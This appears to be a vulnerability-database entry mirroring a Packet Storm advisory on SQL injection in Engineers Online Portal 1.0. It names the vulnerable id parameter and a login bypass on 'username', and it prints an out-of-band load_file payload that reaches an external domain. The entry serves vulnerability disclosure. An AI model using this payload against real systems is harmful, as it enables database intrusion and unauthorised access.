Search...

Engineers Online Portal 1.0 SQL Injection

2021-10-18T00:00:00

ID PACKETSTORM:164535
Type packetstorm
Reporter nu11secur1ty
Modified 2021-10-18T00:00:00

Description

                                        
                                            `# Exploit Title: Engineers Online Portal 1.0 is vulnerable to three types  
of SQL injection attacks.  
# Author: nu11secur1ty  
# Testing and Debugging: nu11secur1ty  
# Date: 10.13.2021  
# Vendor: https://www.sourcecodester.com/users/janobe  
# Link:  
https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html  
  
[+] Exploit Source:  
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/janobe/CVE-nu11-101321  
  
[+] Description:  
The id parameter from my_classmates.php on the Engineers Online Portal app  
appears to be vulnerable to three types of SQL injection  
attacks, boolean-based blind, error-based, and UNION query.  
The payload '+(select load_file('\  
hh2s4z961nps5mtx8px8zoud248ywq0erhf82yqn.nu11secur1tyexploit.net\ggc'))+'  
was submitted in the id parameter.  
This payload injects a SQL sub-query that calls MySQL's load_file function  
with a UNC file path that references a URL on an external domain.  
The application interacted with that domain, indicating that the injected  
SQL query was executed.  
Also, user login is vulnerable to SQL-Injection bypass authentication on  
parameter "username".  
  
  
----------------------------------------------------------------------------------------  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:164535", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Engineers Online Portal 1.0 SQL Injection", "description": "", "published": "2021-10-18T00:00:00", "modified": "2021-10-18T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/164535/Engineers-Online-Portal-1.0-SQL-Injection.html", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-18T15:07:08", "viewCount": 104, "enchantments": {"dependencies": {}, "score": {"value": -0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "sourceHref": "https://packetstormsecurity.com/files/download/164535/eop10-sql.txt", "sourceData": "`# Exploit Title: Engineers Online Portal 1.0 is vulnerable to three types \nof SQL injection attacks. \n# Author: nu11secur1ty \n# Testing and Debugging: nu11secur1ty \n# Date: 10.13.2021 \n# Vendor: https://www.sourcecodester.com/users/janobe \n# Link: \nhttps://www.sourcecodester.com/php/13115/engineers-online-portal-php.html \n \n[+] Exploit Source: \nhttps://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/janobe/CVE-nu11-101321 \n \n[+] Description: \nThe id parameter from my_classmates.php on the Engineers Online Portal app \nappears to be vulnerable to three types of SQL injection \nattacks, boolean-based blind, error-based, and UNION query. \nThe payload '+(select load_file('\\ \nhh2s4z961nps5mtx8px8zoud248ywq0erhf82yqn.nu11secur1tyexploit.net\\ggc'))+' \nwas submitted in the id parameter. \nThis payload injects a SQL sub-query that calls MySQL's load_file function \nwith a UNC file path that references a URL on an external domain. \nThe application interacted with that domain, indicating that the injected \nSQL query was executed. \nAlso, user login is vulnerable to SQL-Injection bypass authentication on \nparameter \"username\". \n \n \n---------------------------------------------------------------------------------------- \n`\n", "_state": {"dependencies": 1646195541}}